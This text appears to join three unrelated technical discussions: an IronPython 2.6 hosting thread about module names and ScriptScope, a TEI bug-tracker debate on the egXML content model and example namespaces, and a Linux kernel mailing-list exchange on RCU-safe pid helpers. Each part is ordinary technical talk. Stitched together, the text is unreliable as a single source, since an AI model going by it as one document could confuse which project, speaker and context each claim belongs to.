More specifically, there seems to be four easy ways to execute a string of python code. The following code has the output listed below: Console.WriteLine(ss.Engine.CreateScriptSourceFromString ("__name__", SourceCodeKind.Expression).Execute(ss)); Console.WriteLine(ss.Engine.CreateScriptSourceFromString ("__name__", SourceCodeKind.Expression).Execute()); Console.WriteLine(ss.Engine.Execute("__name__")); Console.WriteLine(ss.Engine.Execute("__name__", ss)); Output: __main__ __builtin__ <module> <module> On Nov 17, 2:26 pm, "jhow... at drawloop.com" <jhow... at drawloop.com> wrote: > Thanks, that gives me at least something. Any idea why: > > ss.Engine.Execute("__name__", ss); > > returns "<module>" but: > > ss.Engine.CreateScriptSourceFromString("__name__", > SourceCodeKind.Expression).Execute(ss); > > returns "__main__"? > > On Nov 17, 2:12 pm, Dino Viehland <di... at microsoft.com> wrote: > > > I think you now want to do: > > > PythonModule pm = new PythonModule(); > > ScriptEngine se = Python.CreateEngine(); > > PythonContext pc = (PythonContext) HostingHelpers.GetLanguageContext(se); > > pc.PublishModule("__main__", pm); > > > var modContext = new ModuleContext(pm, pc); > > > ScriptScope ss = HostingHelpers.CreateScriptScope(se, modContext.GlobalScope); > > ss.SetVariable("__name__", "__ main__"); > > ss.SetVariable("__doc__", ""); > > > The change here is to create a ModuleContext which will let you then get the Scope. > > > I agree this has gotten worse in 2.6 - I opened a bug a while ago to make working with > > modules easier -. > > > > -----Original Message----- > > > From: users-boun... at lists.ironpython.com [mailto:users- > > > boun... at lists.ironpython.com] On Behalf Of jhow... at drawloop.com > > > Sent: Tuesday, November 17, 2009 2:02 PM > > > To: us... at lists.ironpython.com > > > Subject: Re: [IronPython] Embedded IronPython 2.6 Module Name > > > > I realize I'm replying rather late, but I just got to trying this > > > again. This is something that really should be simple. Anytime a > > > module is run from the ScriptEngine directly, I would expect the > > > behavior to be running as "__main__" just as if I was running it from > > > the command line using "ipy" or "python". Unfortunately, trying to > > > create a module directly doesn't work as far as naming the module. > > > Using the following code: > > > > PythonModule pm = new PythonModule(); > > > ScriptEngine se = Python.CreateEngine(); > > > PythonContext pc = (PythonContext) > > > HostingHelpers.GetLanguageContext(se); > > > pc.PublishModule("__main__", pm); > > > ScriptScope ss = HostingHelpers.CreateScriptScope(se, new > > > Microsoft.Scripting.Runtime.Scope(pm.Get__dict__())); > > > ss.SetVariable("__name__", "__main__"); > > > ss.SetVariable("__doc__", ""); > > > > doesn't work. There's no way to directly get the Scope from the > > > PythonModule when working this way, as it's been marked as internal. > > > Looking through the debugger, the _scope variable that actually holds > > > the scope on the PythonModule object is null. I believe the old > > > CreateModule way of doing this would have worked, but there's no way > > > to that I've found to do this now. > > > > At this point, I'm really not sure how 2.6 is being marked as a > > > release candidate. > > > > On an unrelated note, I could, in IronPython 1.1.2 do the following > > > code: > > > > _pyEngine.Execute("python code", _pyEngine.DefaultModule, > > > args); > > > > where "args" is a Dictionary<string, object> and have those arguments > > > passed in to a function call or the like. Is there any way to do this > > > using the new hosting engine? > > > > Thanks again. > > > > On Nov 6, 2:18 pm, Curt Hagenlocher <c... at hagenlocher.org> wrote: > > > > It looks like you can just create the PythonModule directly now -- > > > it's a > > > > public class with a public constructor. > > > > > On Thu, Nov 5, 2009 at 12:14 PM, Jonathan Howard > > > <jhow... at drawloop.com>wrote: > > > > > > Thanks for the help, Curt. Perhaps it's a problem with the latest, > > > RC? > > > > > There is no "CreateModule" function on the PythonContext object. > > > > > > ~Jonathan > > > > > > _______________________________________________ > > > > > Users mailing list > > > > > Us... at lists.ironpython.com > > > > > > > > > > _______________________________________________ > > > > Users mailing list > > > > Us... at lists.ironpython.com > > > s-ironpython.com > > > _______________________________________________ > > > Users mailing list > > > Us... at lists.ironpython.com > > > > > > _______________________________________________ > > Users mailing list > > Us... at lists.ironpython.com > > _______________________________________________ > Users mailing list > Us... at lists.ironpython.com
|
https://mail.python.org/pipermail/ironpython-users/2009-November/011702.html
|
CC-MAIN-2014-10
|
refinedweb
| 626
| 53.17
|
Chatlog 2010-06-17
From RDFa Working Group Wiki
See CommonScribe Control Panel, original RRSAgent log and preview nicely formatted version.
13:45:26 <RRSAgent> RRSAgent has joined #rdfa 13:45:26 <RRSAgent> logging to 13:45:56 <manu> trackbot, prepare telecon 13:45:58 <trackbot> RRSAgent, make logs world 13:46:00 <trackbot> Zakim, this will be 7332 13:46:00 <Zakim> ok, trackbot; I see SW_RDFa()10:00AM scheduled to start in 14 minutes 13:46:01 <trackbot> Meeting: RDFa Working Group Teleconference 13:46:01 <trackbot> Date: 17 June 2010 13:46:05 <manu> Agenda: 13:46:07 <manu> Chair: Manu 13:46:11 <manu> Scribe: Manu 13:46:19 <manu> scribenick: manu 13:47:51 <manu> Regrets: Ivan, Knud 13:48:50 <Steven> Steven has joined #rdfa 13:52:02 <Benjamin> Benjamin has joined #rdfa 13:57:48 <manu> Present: Manu, Steven, Benjamin, Toby, MarkB, Shane 14:00:15 <Zakim> SW_RDFa()10:00AM has now started 14:00:19 <Zakim> +[IPcaller] 14:00:20 <manu> zakim, I am IPCaller 14:00:21 <Zakim> ok, manu, I now associate you with [IPcaller] 14:00:27 <manu> zakim, who is on the call? 14:00:33 <markbirbeck> zakim, code? 14:00:38 <Zakim> On the phone I see [IPcaller] 14:00:38 <tinkster> tinkster has joined #rdfa 14:00:42 <Zakim> the conference code is 7332 (tel:+1.617.761.6200 tel:+33.4.89.06.34.99 tel:+44.117.370.6152), markbirbeck 14:01:54 <Zakim> +ShaneM 14:03:57 <Steven> zakim, dial steven-617 14:03:57 <Zakim> ok, Steven; the call is being made 14:04:01 <Zakim> +Steven 14:23:18 <manu> Topic: ISSUE-26: Error Reporting Mechanism (on Ivan) 14:23:29 <Steven> issue-26? 14:23:29 <trackbot> ISSUE-26 -- Do we need an error reporting mechanism for RDFa? -- open 14:23:29 <trackbot> 14:24:24 <Zakim> -[IPcaller] 14:24:59 <Zakim> +[IPcaller] 14:26:27 <markbirbeck> q+ 14:26:38 <Steven> ack mark 14:27:05 <manu> Manu: This concerns two things... do we want an error reporting mechanism? if so, what does it look like? 14:27:27 <manu> Mark: Well, you say RDFa Processor, but we also have an RDFa API now. We may have to come at it from two directions. 14:27:46 <manu> Mark: We may want to have something about this on RDFa Core, but we may want to also have something in the RDFa API spec. 14:28:11 <manu> Mark: Perhaps we shouldn't put Events in RDFa Core... but maybe we want to spec Events in RDFa API. 14:28:29 <Benjamin> +1 to add events about errors or warnings in the RDFa API 14:29:10 <manu> Manu: Anyone opposed to having an error mechanism? 14:29:16 <manu> Steven: I think it would be useful to have. 14:29:40 <manu> PROPOSAL: RDFa should have a warning and error reporting mechanism. 14:29:49 <manu> Manu: +1 14:29:50 <markbirbeck> +1 14:29:53 <Benjamin> +1 14:30:07 <Steven> +1 depending on form 14:30:19 <tinkster> DataParser.parse(store, callback); /* callback is a function called back for each error. */ 14:30:20 <ShaneM> +1 14:31:02 <tinkster> +1 API should; -1 for Core having one. 14:31:08 <manu> RESOLVED: RDFa should have an warning and error reporting mechanism. 14:32:02 <markbirbeck> @tinkster Yes, that's one option. I favour using DOM 2 Events myself, but maybe that just means that your 'callback' is an EventHandler object. 14:33:08 <manu> Manu: (explains current proposal) 14:33:20 <tinkster> A processor implementing RDFa but not the RDFa API might want to have a method of passing back errors to whatever invoked it, but what that method is seems beyond the scope of RDFa to me. The RDFa API seems the only place where we should get involved in how errors are reported back. 14:33:48 <Steven> Not sure if I agree 14:33:54 <Steven> having an error graph could work 14:34:16 <ShaneM> but RDF doesn';t really define how to access alternate graphs? 14:34:28 <markbirbeck> @tinkster: I don't think there's anything wrong with defining an error graph in core. But definitely it shouldn't define behaviour like events. That's for the API. 14:34:47 <Steven> agree on that 14:35:20 <manu> Mark: Shane, I think that's true, but this can be processor-specific. All we're really saying is that we should define some RDF terminology to define what errors are... and that these are available to the processor in a certain way. 14:35:50 <Benjamin> q+ on asking What is the advantage of storing warning and errors instead of just raising them as events? 14:35:54 <manu> Shane: What if we define /something/ in the RDFa namespace that mean error or warning, but they can be returned in the regular graph. 14:35:55 <markbirbeck> q+ 14:35:58 <manu> ack benjamin 14:35:58 <Zakim> Benjamin, you wanted to comment on asking What is the advantage of storing warning and errors instead of just raising them as events? 14:36:09 <manu> Benjamin: I don't see the advantages of warnings and errors in the default graph. 14:36:30 <manu> ack mark 14:36:40 <ShaneM> remember that there are many processors that are not embedded in a web page - no event mechanism 14:36:56 <manu> Mark: There are two things going on here - whether we have triples that indicate warnings, that's one question, whether or not they're in the default graph is another question. 14:37:15 <Benjamin> @Shane, ok I see the point, but how do XML parsers solve this issue? 14:37:17 <manu> Mark: People are doing this in different ways at the moment... I don't think it should be in the default graph. 14:37:49 <ShaneM> okay - never mind 14:37:54 <Steven> Agree, bad idea to put them in the default graph 14:38:51 <manu> Manu: Let's move this discussion to the mailing list. 14:38:58 <manu> Topic: ISSUE-5: @datatype and rdf:XMLLiteral (on Toby) 14:39:05 <manu> 14:39:18 <tinkster> I don't think this is a contraversial issue at all. Move to resolve immediately? 14:39:49 <tinkster>! 14:39:55 <markbirbeck> q+ 14:40:07 <manu> Manu: (explains issue) 14:40:11 <tinkster> that exclamation mark shouldn't be there. 14:40:23 <manu> Mark: We may want to have a token for XMLLiteral. 14:41:21 <tinkster> Mark++ e.g. datatype="xml" 14:42:08 <markbirbeck> @tinkster: Actually, you're right...that's much better.:) 14:42:14 <ShaneM> ++ tinkster 14:42:24 <Steven> +1 14:42:26 <ShaneM> +1 14:42:36 <markbirbeck> +1 14:42:38 <Benjamin> +1 14:43:20 <manu> PROPOSAL: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the rdf:XMLLiteral datatype, generate an XMLLiteral. 14:43:57 <manu> PROPOSAL: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the RDF XMLLiteral URL, generate an XMLLiteral. 14:44:16 <manu> Manu: +1 14:44:20 <Steven> +1 14:44:21 <Benjamin> +1 14:44:23 <tinkster> +1 14:44:25 <markbirbeck> +1 14:44:32 <Steven> ZAKIM, WHO IS NOISY? 14:44:32 <ShaneM> +1 14:44:42 <Zakim> Steven, listening for 10 seconds I heard sound from the following: Benjamin (4%), Steven (8%), ShaneM.a (44%) 14:44:44 <manu> RESOLVED: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the RDF XMLLiteral URL, generate an XMLLiteral. 14:45:07 <Steven> zakim, who is noisy? 14:45:17 <Zakim> Steven, listening for 10 seconds I heard sound from the following: ShaneM.a (10%) 14:45:28 <ShaneM> zakim, mute me 14:45:28 <Zakim> ShaneM.a should now be muted 14:45:31 <Steven> zakim, mute shane temporarily 14:45:31 <Zakim> ShaneM.a was already muted, Steven 14:45:53 <ShaneM> zakim, unmute me 14:45:53 <Zakim> ShaneM.a should no longer be muted 14:45:55 <manu> Topic: ISSUE-20: Deep Processing of XMLLiterals (on Mark) 14:46:05 <Steven> issue-20? 14:46:05 <trackbot> ISSUE-20 -- XMLLiteral content isn't processed for RDFa attributes in RDFa 1.0 - should this change in RDFa 1.1? -- open 14:46:05 <trackbot> 14:46:39 <ShaneM> definitely not 14:46:40 <manu> Manu: (explains issue) 14:46:56 <Steven> I need a use case 14:46:59 <manu> Manu: Anybody want to change default behavior from RDFa 1.0 - extract triples from XML Literal 14:47:07 <tinkster> there are certainly good use cases. 14:47:07 <ShaneM> it would break compatibility in a dramatic manner., 14:47:39 <tinkster> it would break backcompat, so would need to be done with an explicit opt-in. 14:49:00 <tinkster> e.g. use case a blog. blog entry titles, authors, etc are marked up in RDFa. 14:49:06 <manu> 14:49:21 <tinkster> each entry has the content as an XMLLiteral. 14:49:48 <tinkster> but perhaps the content contains data that could also be usefully exposed as RDFa... 14:50:13 <manu> Mark: I wonder whether or not we could hold off on this... 14:50:47 <manu> Mark: I thought that most of the scenarios where you'd want XMLLiterals to "store" data - most of those scenarios could be solved using CDATA or COMMENTs. 14:51:17 <manu> Mark: Perhaps we can escape the data in-line, so the RDFa parser stores it literally... if it is in "the structure" parse it as is. 14:51:51 <manu> Manu: Move discussion of this to the mailing list. 14:52:06 <manu> Topic: ISSUE-27: Relative URIs (on Shane) 14:52:47 <Steven> issue-27? 14:52:47 <trackbot> ISSUE-27 -- Does TermorCURIEorURI allow relative URIs? -- open 14:52:47 <trackbot> 14:52:58 <manu> Manu: Any arguments for/against? 14:54:13 <manu> Shane: I don't think allowing relative URIs in a datatype make sense - it was not what we envisioned when we created datatype. 14:54:18 <markbirbeck> q+ 14:54:38 <tinkster> An argument against might be future extensibility. By disallowing these now, RDFa 1.2/2.0 might like to define some kind of token which looks a bit like a relative URI. 14:54:44 <manu> Steven: I'm uncomfortable with not allowing things... what do we lose by allowing relative URIs? 14:55:00 <manu> Mark: I agree with Steven, how do we ban this? I think this was originally intended. 14:55:43 <ShaneM> q+ to argue with mark ;-) 14:55:52 <Steven> ack mark 14:55:52 <manu> Mark: It's a bit like the discussion on absolute URIs - we had issues with distinguishing with QNames - if the prefix is undefined, it's a URI. 14:55:54 <manu> ack mark 14:55:56 <Steven> ack shane 14:55:56 <Zakim> ShaneM.a, you wanted to argue with mark ;-) 14:55:56 <manu> ack shane 14:56:38 <manu> Shane: You're right, except that this means that if I use a token and it's not defined, it's a relative URI. 14:57:02 <manu> Shane: Is it relative to the current vocab URI? Or the current base? 14:58:02 <ShaneM> how does this concept work in conjunction with this resolution: RESOLVED: RDFa attributes containing all invalid values should be interpreted as those attributes with an empty attribute value. ← 14:58:09 <manu> Manu: This is like our junk triples discussion. 14:58:29 <manu> Mark: Well, they're not junk triples... they meant to create a triple, it's just the wrong one. 14:58:57 <manu> Manu: What's the use case for this? 14:59:10 <manu> Mark: If you're doing something like an OWL ontology, the predicates are the values in the ontology. 14:59:53 <manu> Mark: It's not a strong argument for it... but Stevens opening remark is fair... what do we gain by removing it? 15:00:01 <tinkster> If you're doing something like an OWL ontology, you can just set vocab="..." on your entire document anyway. 15:00:23 <tinkster> We're not "removing it" per se - they're not allowed in RDFa 1.0 anyway. 15:02:27 <manu> Manu: Sounds like we don't have a s trong use case... we're not removing it, just saying it's undefined and it doesn't generate a triple. 15:03:16 <markbirbeck> q+ 15:03:23 <ShaneM> 15:03:43 <manu> q+ to end telecon 15:04:24 <manu> Mark: So, basically if we "prevent" relative URIs... we have to detect them. # SPECIAL MARKER FOR CHATSYNC. DO NOT EDIT THIS LINE OR BELOW. SRCLINESUSED=00000192
|
http://www.w3.org/2010/02/rdfa/wiki/Chatlog_2010-06-17
|
CC-MAIN-2014-49
|
refinedweb
| 2,191
| 71.85
|
import "gopkg.in/webhelp.v1/whcompat"
Package whcompat provides webhelp compatibility across different Go releases.
The webhelp suite depends heavily on Go 1.7 style http.Request contexts, which aren't available in earlier Go releases. This package backports all of the functionality in a forwards-compatible way. You can use this package to get the desired behavior for all Go releases.
close18.go compat17.go pkg.go
CloseNotify causes a handler to have its request.Context() canceled the second the client TCP connection goes away by hooking the http.CloseNotifier logic into the context. Prior to Go 1.8, this costs an extra goroutine in a read loop. Go 1.8 and on, this behavior happens automatically with or without this wrapper.
Context is a light wrapper around the behavior of Go 1.7's (*http.Request).Context method, except this version works with earlier Go releases, too. In Go 1.7 and on, this simply calls r.Context(). See the note for WithContext for how this works on previous Go releases. If building with the appengine tag, when needed, fresh contexts will be generated with appengine.NewContext().
DoneNotify cancels request contexts when the http.Handler returns in Go releases prior to Go 1.7. In Go 1.7 and forward, this is a no-op. You get this behavior for free if you use whlog.ListenAndServe.
WithContext is a light wrapper around the behavior of Go 1.7's (*http.Request).WithContext method, except this version works with earlier Go releases, too. IMPORTANT CAVEAT: to get this to work for Go 1.6 and earlier, a few tricks are pulled, such as expecting the returned r.URL to never change what object it points to, and a finalizer is set on the returned request.
Package whcompat imports 2 packages (graph) and is imported by 15 packages. Updated 2017-06-02. Refresh now. Tools for package owners.
|
https://godoc.org/gopkg.in/webhelp.v1/whcompat
|
CC-MAIN-2018-51
|
refinedweb
| 318
| 61.93
|
Type: Posts; User: italianboy
so far only done the GUI i dunno how am i gonna write it!
How am i write the coding for Highscore Table that can save the name of the player in the table! By using C# languages. Any hints pls help!
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
...
cant run its show error do i need to add something on it?
timer_timer1;
Error 1 'Timer' is a 'namespace' but is used like a 'type'
Yea i already try many times b4 i post but i still cant mange to do that!
I know is simple but its hard when come to the write code part!
Can u gv me some link where can i reference to?
Because i...
hi,
Firstly i click the start button then, the timer tick then the label will show up the time counted from 0s until the people solve the puzzle then the time will stop!
How am i gonna write...
|
http://forums.codeguru.com/search.php?s=c223e69b2293d988029e909adf928f1a&searchid=2454481
|
CC-MAIN-2014-10
|
refinedweb
| 179
| 78.25
|
MEMSET(3) NetBSD Library Functions Manual MEMSET(3)Powered by man-cgi (2020-09-24). Maintained for NetBSD by Kimmo Suominen. Based on man-cgi by Panagiotis Christias.
NAME
memset -- write a byte to byte string
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <string.h> void * memset(void *b, int c, size_t len);
DESCRIPTION
The memset() function writes len bytes of value c (converted to an unsigned char) to the string b.
RETURN VALUES
The memset() function returns the original value of b. Note that the compiler may optimize away a call to memset() if it can prove that the string will not be used by the program again, for example if it is allocated on the stack and about to go out of scope. If you want to guarantee that zeros are written to memory, for example to sani- tize a buffer holding a cryptographic secret, use explicit_memset(3).
SEE ALSO
bzero(3), explicit_memset(3), swab(3)
STANDARDS
The memset() function conforms to ANSI X3.159-1989 (``ANSI C89''). NetBSD 9.0 June 23, 2013 NetBSD 9.0
|
https://man.netbsd.org/NetBSD-9.0/i386/memset.3
|
CC-MAIN-2021-10
|
refinedweb
| 180
| 64.91
|
The purpose of this tutorial is to show you how to use the new lambda expressions available in JDK 8. You can download the latest
build of JDK 8 at.
We are going to start with a simple example. Anyone who has done threading in java is familiar with the Runnable interface,
which can be given to a Thread to run the code within the run method on a separate thread. Let's take a look at the old way
to do this and the new way. The first variable r1 is an instance of a Runnable interface done the old way, the second variable
r2 is how you do it with lambda expressions.
public class ThreadTest {
public static void main(String[] args) {
Runnable r1 = new Runnable() {
@Override
public void run() {
System.out.println("Old Java Way");
}
};
Runnable r2 = () -> { System.out.println("New Java Way"); };
new Thread(r1).start();
new Thread(r2).start();
}
}
Notice that we take all of the boilerplate code which we write every time and get rid of it all with a simple expression. In face, the code
to start the thread could even be simplified further as:
new Thread(() -> System.out.println("New Java Way")).start();
In the next section, we will show how to use a comparator the Java 8 way.
Prev (TOC) |
Next (Comparator)
|
http://www.dreamsyssoft.com/java-8-lambda-tutorial/intro-tutorial.php
|
CC-MAIN-2016-40
|
refinedweb
| 220
| 74.59
|
Stack is an abstract data type.
Basic operation of stack can be:
1. Push :
Push object on top of stack.
Throw exception if stack is full.
2. Pop :
Take out(remove) object that is on top of stack .
Throw exception if stack is empty.
3. Top:
Read the object that is on top of stack.
Throw exception if stack is empty.
Now we need to implement these all operation in Java using Object Array.
Below is my eclipse folder structure. You may find this common but keeping all beginners in mind so please bare with me.
Lets define an interface for a stack:
package datastructure.stack; public interface Stack { //accessor method stack public int size(); public boolean isEmpty(); public Object top() throws Exception; //update method stack public void push(Object element) throws Exception; public Object pop() throws Exception; }
Now we need to implement these functionality. So will be implementing this interface by our class called ArrayStack.java.
package datastructure.stack; public class ArrayStack implements Stack { private Object stack[]; private int capacity; private int currentPos=-1; public ArrayStack(int capacity){ this.capacity = capacity; stack = new Object[capacity]; } @Override public int size() { // TODO Auto-generated method stub return this.capacity; } @Override public boolean isEmpty() { // TODO Auto-generated method stub if(currentPos<0){ return true; } return false; } @Override public Object top() throws Exception { // TODO Auto-generated method stub if(currentPos<0){ throw new Exception(" Stack is Empty"); } return stack[currentPos]; } @Override public void push(Object element) throws Exception { // TODO Auto-generated method stub if(currentPos==capacity){ throw new Exception(); } stack[++currentPos] = element; } @Override public Object pop() throws Exception { // TODO Auto-generated method stub if(currentPos<0){ throw new Exception(); } return stack[currentPos--] = null; } }
As you can see in the ArrayStack.java,
we define constructor to initialize the size of our stack. This size will set the limit on number of element in stack.
So let me just briefly explain about class variable and methods.
Object stack[] : An array which is going to be our stack(element holder)
int capacity : Max size of Stack
int currentPos : It is pointer of top element of stack. We will need to increment it when any element is pushed, decrement it when we do the pop operation. Initially we kept it -1 as first element will have index 0. So if there is no element it should be -1.
public int size() : Gives you the capacity of Stack, which was set at the time of initialization.
public boolean isEmpty() : Gives you true/false based on currentPos pointer.
public Object top() : Return the object that is there on top of stack. It does not remove it. And if there is no element that it will throw exception.
public void push(Object element) : Push the object specified as the parameter. If stack is full than it will throw exception.
public Object pop() : Remove the element that is there on top of stack. If stack is empty it will throw the exception.
So thats all everyone. Below is some basic operation that I ran and the output of it.
import datastructure.stack.ArrayStack; public class MainPractise { public static void main(String[] args) { ArrayStack as = new ArrayStack(10); // Stack can have at max 10 element try{ System.out.println("Stack size:"+as.size()); as.push("Nirav"); // push String object in stack as.pop(); // pop Nirav out of stack 🙁 as.push("Nihar"); String topString = (String)as.top(); // chek out nihar 😛 System.out.println(topString); /* U will see stubborn nihar string object print out bt the object will still be there */ as.pop(); // Now There is no element in stack as.pop(); // it will throw exception as stack is empty }catch(Exception e){ System.out.println("Exception message:"+e.getMessage()); } } }
The output of above code is:
Stack size:10
Nihar
Exception message:Stack is Empty
This is it.
You can have above code from GIT.
If you have any question mail us on
snippetexample@gmail.com or Post comments or join us on facebook.
|
http://www.snippetexample.com/2014/09/stack-implementation-using-array/
|
CC-MAIN-2019-18
|
refinedweb
| 660
| 58.58
|
The TEI guidelines unambiguously state that <egXML> should be used to contain XML example fragments:
eg: Section 22.4.2 Exemplification of Components () quotes the description for <egXML>:
"egXML (example of XML) contains a single
well-formed XML fragment demonstrating the use
of some XML element or attribute, in which the
egXML element itself functions as the root
element. "
and further states explicitly that
"[a]n egXML element should not be used to tag
non-XML examples: the general purpose eg or q
elements should be used for such purposes."
Yet, <egXML> is formally specified to contain only text ():
<rng:element
<rng:ref
<rng:ref
<rng:text/>
</rng:element>
Which seems obviously wrong to me. James Cummings pointed me to a modified definition of <egXML> in:
<elementSpec module="tagdocs" ns="" usage="mwa" ident="egXML" mode="change">
<content>
<oneOrMore xmlns="">
<choice>
<text/>
<ref name="anyTEI"/>
</choice>
</oneOrMore>
</content>
</elementSpec>
Where "anyTEI" is specified as a macro listing all TEI elements. There are two problems with this definition as well:
1. all examples in the distributed TEI odd files should be properly namespaced. Instead of
<egXML xmlns="">
<p>I fully appreciate Gen. Pope's splendid
achievements with their invaluable results; but
you must know that Major Generalships in the
Regular Army, are not as plenty as blackberries.
</p>
</egXML>
it should be
<eg:egXML xmlns:
<p>I fully appreciate Gen. Pope's splendid
achievements with their invaluable results; but
you must know that Major Generalships in the
Regular Army, are not as plenty as blackberries.
</p>
</eg:egXML>
2. Even then, this content model would be too limited w.r.t. the prose description that "any well-formed XML fragment" should be allowed in <egXML>. It appears that such a general content model can be expressed in Relax NG without much problems[1].
To round up, I suggest that
1. Minimally, the general content model of <egXML> should be replaced with the adapted definition from tei_odds.odd.
2. Optimally, the general content model of <egXML> should be relaxed to allow for any XML element
3. Optionally, the examples TEI ODD files should be recoded with proper namespaces.
Ron Van den Branden
====
[1] examples of such definitions:
*
*
Lou Burnard
2008-07-19
Logged In: YES
user_id=1021146
Originator: NO
The main use for egXML in P5 is as a means of validating the examples against the TEI example schema, which is a schema that permits any TEI element as root, but observes constraints for its children thereafter. A content model of ANY or of plain text would not give us this (very useful) degree of validation. This is why we use the definition in tei_odds rather than the "canonical" one. The latter is different because we don't assume that everyone will necessarily want to use egXML in TEI ODD documents. We chose "text" as the least annoying possible content model for people wanting to use this element to mark up examples from other XML syntaxes, fully expecting that they might want to modify it in the same way that we have for ODD purposes. I agree that ANY would have been another choice we might have made, so that egXML examples would at least be constrained to be well-formed.
I don't understand the point you are making about the namespace.
Syd Bauman
2008-07-19
Logged In: YES
user_id=686243
Originator: NO
Deep and impressive analysis Ron, keep up the good work! However, I
only agree with one of your three suggestions, as follows.
1. The content model from tei_odds.odd is, deliberately, *far* more
restrictive than the generic <egXML> element's content, because it
is not intended to be used for any TEI document (which might, e.g.,
be used to exemplify some non-TEI language or elements outside the
TEI namespace). The tei_odd schema is not intended for use by the
general user, but rather the user who wants to write an ODD for a
TEI customization.
2. The general content model for <egXML> always should have been
something that constrains the content to match the prose, e.g.
using the pattern 'any', declared as
any = ( element * { any* } | attribute * { text }* | text )
might do the trick. I think this is an egregious and corrigible
error, although it is a minor one.
3. AFAIK, there is no difference between
<egXML xmlns="">
and
<eg:egXML xmlns:
As far as an XML processor is concerned, those two are the same.
(The element with local-name 'egXML' from the namespace
''.) While I can see the argument
that the latter might be a little easier for humans to follow
what's going on (less likely your eye skips the detail that the
element is in a different namespace), it may turn out to be quite a
pain to maintain in the source for the Guidelines, depending on the
software used (as everytime one ran the source through a processor,
it may change it back).
Logged In: YES
user_id=95949
Originator: NO
Two points.
a) the reason why <egXML> does not have the generic "any XML with any attribute" pattern is because
it does not translate to DTDs. In retrospect, I now think we should have made that work as it
ought, and dumbed down the DTD to PCDATA. I propose to make that change at the next release unless
there are objections from the Council when its discussed.
b) sorry, but
<egXML xmlns="">
and
<eg:egXML xmlns:
are really not the same at all. In the first case, the namespace
is inherited by child elements, in the second case only the <egXML>
is in that example namespace.
Syd Bauman
2008-07-19
Logged In: YES
user_id=686243
Originator: NO
Sebastian --
(a) Excellent! Glad to hear it.
(b) Yes, indeed, you are correct of course. I should have been more precise, as in
<egXML xmlns="">
<p>Quack!</p>
</egXML>
and
<eg:egXML xmlns:
<eg:p>Quack!</eg:p>
</eg:egXML>
are the same. (Although the same applies to other descendants, too, of course.)
Logged In: YES
user_id=95949
Originator: NO
Just for the record, by the way, it was a conscious decision that all the
examples in the Guidelines be encoded in the Examples namespace rather
than the _real_ TEI namespace. It was (and probably still is) a controversial
decision, but the rationale was twofold:
a) otherwise, every small example
would have to have an xmlns attribute added to its root element(s), and that
this would impose a burden on editors.
b) if all the examples were actually in the TEI namespace, it would
play merry hell with processing the actual Guidelines text. XSL
constructs like <xsl:number would all have to be adjusted
to exclude anything which was a descendant of egXML. Doable, of course,
and maybe this was pusillanimity :-}
ron van den branden
2008-07-19
Logged In: YES
user_id=1110667
Originator: YES
> Just for the record, by the way, it was a conscious decision that all the
> examples in the Guidelines be encoded in the Examples namespace rather
> than the _real_ TEI namespace. It was (and probably still is) a
> controversial decision, but the rationale was twofold:
Ah, my assumption was that <egXML> was explicitly designed to allow its contents to be validated in their own namespace (instead of the Examples namespace). That's why I thought
<p xmlns="">
<eg:egXML xmlns:
<p>Quack!
<div>This is not exactly a valid TEI example</div>
</p>
</eg:egXML>
</p>
would
a) allow the erroneous TEI content of <egXML> to be spotted at validation
b) be a way to avoid the TEI namespace declaration on any child element
But on second thought, my association between 'TEI namespacedness' and validation might be too naive? If a TEI document is validated against, say, TEI lite, will this schema association automatically apply to TEI-namespaced contents of <egXML> as well? Or am I completely missing the point?
Logged In: YES
user_id=95949
Originator: NO
I think you may be reading too much into this. In retrospect, I wonder
if we designed this element wrong, putting <egXML> into its own namepsace,
and using that to hide the namespace of the contents.
Still, it is what it is. You can put any element in there, and adjust
the schema to validate them, and thats aboyt as far as it goes. The
Guidelines cheat, but putting fake TEI examples in there, without
explaining it well, which I confess to being ashamed of :-{
Lou Burnard
2008-08-17
Lou Burnard
2008-09-03
Sebastian Rahtz
2008-09-04
|
http://sourceforge.net/p/tei/bugs/41/
|
CC-MAIN-2014-42
|
refinedweb
| 1,418
| 59.33
|
On Fri, Jan 16, 2009 at 09:45:40PM +0100, Oleg Nesterov wrote:> Hi Louis,> > On 01/16, Louis Rilling wrote:> >> > On 16/01/09 6:55 +0100, Oleg Nesterov wrote:> > > + struct pid_namespace *ns)> > > {> > > - return pid_nr_ns(task_pid(tsk), ns);> > > + pid_t nr = 0;> > > +> > > + rcu_read_lock();> > > + if (!ns)> > > + ns = current->nsproxy->pid_ns;> > > + if (likely(pid_alive(task))) {> >> > I don't see what this pid_alive() check buys you. Since tasklist_lock is not> > enforced, nothing prevents another CPU from detaching the pid right after the> > check.> > pid_alive() should be renamed. We use it to make sure the task didn't pass> __unhash_process().> > Yes, you are right, nothing prevents another CPU from detaching the pid right> after the check. But this is fine: we read ->pids[].pid under rcu_read_lock(),> and if it is NULL pid_nr_ns() returns. So, we don't need pid_alive() check at> all.> > However, we can not use task->group_leader unless we verify the task is still> alive. That is why we need this check. We do not clear ->group_leader when> the task exits, so we can't do> > rcu_read_lock();> if (task->group_leader)> do_something(task->group_leader);> rcu_unread_lock();> > Instead we use pid_alive() before using ->group_leader.Ok I see now. Since RCU is locked and pid_alive(task) has been true atsome point, task->group_leader cannot be freed because release_task()does not release task->group_leader before releasing task. IOWrelease_task() can't have started releasing task->group_leader beforercu_read_lock().Thank you for your explanation!> > > I'm also a bit puzzled by your description with using tasklist_lock when task !=> > current, and not seeing tasklist_lock anywhere in the patch. Does this mean that> > "safe" is for "no access to freed memory is done, but caller has to take> > tasklist_lock or may get 0 as return value"?> > I am not sure I understand the question...> > This patch doesn't use tasklist, it relies on rcu. With this patch the caller> doesn't need tasklist/rcu to call these helpers (but of course, the caller> must ensure that task_struct is stable).> > But, whatever the caller does, it can get 0 as return value anyway if the> task exists, this is correct. Or I misunderstood you?My question was probably badly phrased. When reading the patchdescription I thought that the point was to fix the helpers so thattasklist_lock would be taken whenever task != current. Of course yourpatch does not do this, and I'm perfectly fine with this.Thanks,Louis-- Dr Louis Rilling Kerlabs - IRISASkype: louis.rilling Campus Universitaire de BeaulieuPhone: (+33|0) 2 99 84 71 52 Avenue du General LeclercFax: (+33|0) 2 99 84 71 71 35042 